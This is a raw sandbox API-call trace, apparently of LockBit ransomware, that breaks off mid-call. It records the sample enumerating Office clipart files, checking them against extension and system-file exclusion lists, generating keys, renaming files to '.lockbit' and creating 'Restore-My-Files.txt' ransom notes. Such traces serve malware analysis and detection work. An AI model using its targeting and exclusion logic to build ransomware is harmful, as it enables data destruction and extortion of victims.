(_Block=0x77d800) [0109.808] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.808] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.808] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.808] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xceceee00, ftCreationTime.dwHighDateTime=0x1c9b81d, ftLastAccessTime.dwLowDateTime=0x60382570, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xceceee00, ftLastWriteTime.dwHighDateTime=0x1c9b81d, nFileSizeHigh=0x0, nFileSizeLow=0xdec, dwReserved0=0x0, dwReserved1=0x0, cFileName="CG1606.WMF", cAlternateFileName="")) returned 1 [0109.808] lstrcmpiW (lpString1=".", lpString2="CG1606.WMF") returned -1 [0109.808] lstrcmpiW (lpString1="..", lpString2="CG1606.WMF") returned -1 [0109.808] PathFindExtensionW (pszPath="CG1606.WMF") returned=".WMF" [0109.809] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.809] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.809] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.809] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.809] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.809] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.809] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.809] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.809] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.809] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.809] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.809] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.809] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.809] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.809] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.809] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.809] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.809] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.809] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.809] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.809] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.809] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.810] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.810] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.810] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.810] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.810] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.810] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.810] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.810] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.810] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.810] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.810] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.810] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.810] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.810] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.810] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.810] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.810] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.810] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.811] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.811] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.811] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.811] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.811] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.811] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.811] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.811] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="CG1606.WMF") returned 1 [0109.811] lstrcmpiW (lpString1="ntldr", lpString2="CG1606.WMF") returned 1 [0109.811] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="CG1606.WMF") returned 1 [0109.811] lstrcmpiW (lpString1="bootsect.bak", lpString2="CG1606.WMF") returned -1 [0109.811] lstrcmpiW (lpString1="autorun.inf", lpString2="CG1606.WMF") returned -1 [0109.811] lstrcmpiW (lpString1="thumbs.db", lpString2="CG1606.WMF") returned 1 [0109.811] lstrcmpiW (lpString1="iconcache.db", lpString2="CG1606.WMF") returned 1 [0109.811] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.811] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned=".WMF" [0109.811] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.811] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.812] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.812] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.812] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.812] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.812] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.812] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.812] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.812] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.812] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.812] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.812] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.812] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.812] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.812] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.812] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.812] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.812] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.812] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.813] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.813] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.813] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.813] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.813] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.813] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.813] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.813] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.813] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF.lockbit") returned 70 [0109.813] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0109.818] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.818] malloc (_Size=0x40068) returned 0x3d70048 [0109.818] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=3564) returned 1 [0109.818] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.819] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0109.819] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.820] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0109.820] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0109.836] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.836] malloc (_Size=0xa2) returned 0x77d800 [0109.836] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0109.837] free (_Block=0x77d800) [0109.837] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.837] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.837] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.837] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x51c76e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x976, dwReserved0=0x0, dwReserved1=0x0, cFileName="CLASSIC1.WMF", cAlternateFileName="")) returned 1 [0109.837] lstrcmpiW (lpString1=".", lpString2="CLASSIC1.WMF") returned -1 [0109.837] lstrcmpiW (lpString1="..", lpString2="CLASSIC1.WMF") returned -1 [0109.837] PathFindExtensionW (pszPath="CLASSIC1.WMF") returned=".WMF" [0109.837] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.837] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.837] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.838] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.838] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.838] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.838] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.838] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.838] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.838] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.838] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.838] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.838] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.838] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.838] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.838] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.838] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.838] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.838] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.838] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.838] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.838] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.839] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.839] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.839] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.839] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.839] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.839] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.839] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.839] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.839] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.839] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.839] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.839] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.839] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.839] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.839] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.839] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.839] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.839] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.839] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.839] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.839] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.840] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.840] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.840] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.840] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.840] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="CLASSIC1.WMF") returned 1 [0109.840] lstrcmpiW (lpString1="ntldr", lpString2="CLASSIC1.WMF") returned 1 [0109.840] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="CLASSIC1.WMF") returned 1 [0109.840] lstrcmpiW (lpString1="bootsect.bak", lpString2="CLASSIC1.WMF") returned -1 [0109.840] lstrcmpiW (lpString1="autorun.inf", lpString2="CLASSIC1.WMF") returned -1 [0109.840] lstrcmpiW (lpString1="thumbs.db", lpString2="CLASSIC1.WMF") returned 1 [0109.840] lstrcmpiW (lpString1="iconcache.db", lpString2="CLASSIC1.WMF") returned 1 [0109.840] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.840] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned=".WMF" [0109.840] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.840] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.840] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.840] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.840] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.840] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.840] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.841] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.841] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.841] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.841] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.841] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.841] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.841] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.841] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.841] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.841] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.841] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.841] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.841] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.841] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.841] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.841] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.841] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.841] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.841] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.841] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.841] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.841] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF.lockbit") returned 72 [0109.841] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0109.847] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.847] malloc (_Size=0x40068) returned 0x3db00b8 [0109.847] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=2422) returned 1 [0109.847] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.848] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0109.848] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.848] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0109.848] ReadFile (in: hFile=0x81c, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0109.852] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.852] malloc (_Size=0xa6) returned 0x77d800 [0109.852] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.852] free (_Block=0x77d800) [0109.852] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.853] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.853] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.853] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x603a86d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x8d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="CLASSIC2.WMF", cAlternateFileName="")) returned 1 [0109.853] lstrcmpiW (lpString1=".", lpString2="CLASSIC2.WMF") returned -1 [0109.853] lstrcmpiW (lpString1="..", lpString2="CLASSIC2.WMF") returned -1 [0109.853] PathFindExtensionW (pszPath="CLASSIC2.WMF") returned=".WMF" [0109.853] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.853] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.853] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.853] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.853] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.853] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.853] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.853] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.853] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.853] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.853] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.853] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.853] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.853] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.853] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.853] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.853] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.853] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.853] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.854] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.854] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="CLASSIC2.WMF") returned 1 [0109.855] lstrcmpiW (lpString1="ntldr", lpString2="CLASSIC2.WMF") returned 1 [0109.855] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="CLASSIC2.WMF") returned 1 [0109.855] lstrcmpiW (lpString1="bootsect.bak", lpString2="CLASSIC2.WMF") returned -1 [0109.855] lstrcmpiW (lpString1="autorun.inf", lpString2="CLASSIC2.WMF") returned -1 [0109.855] lstrcmpiW (lpString1="thumbs.db", lpString2="CLASSIC2.WMF") returned 1 [0109.855] lstrcmpiW (lpString1="iconcache.db", lpString2="CLASSIC2.WMF") returned 1 [0109.855] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.855] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned=".WMF" [0109.855] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.855] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.855] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.855] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.855] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.855] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.855] lstrcmpiW (lpString1=".db-shm", 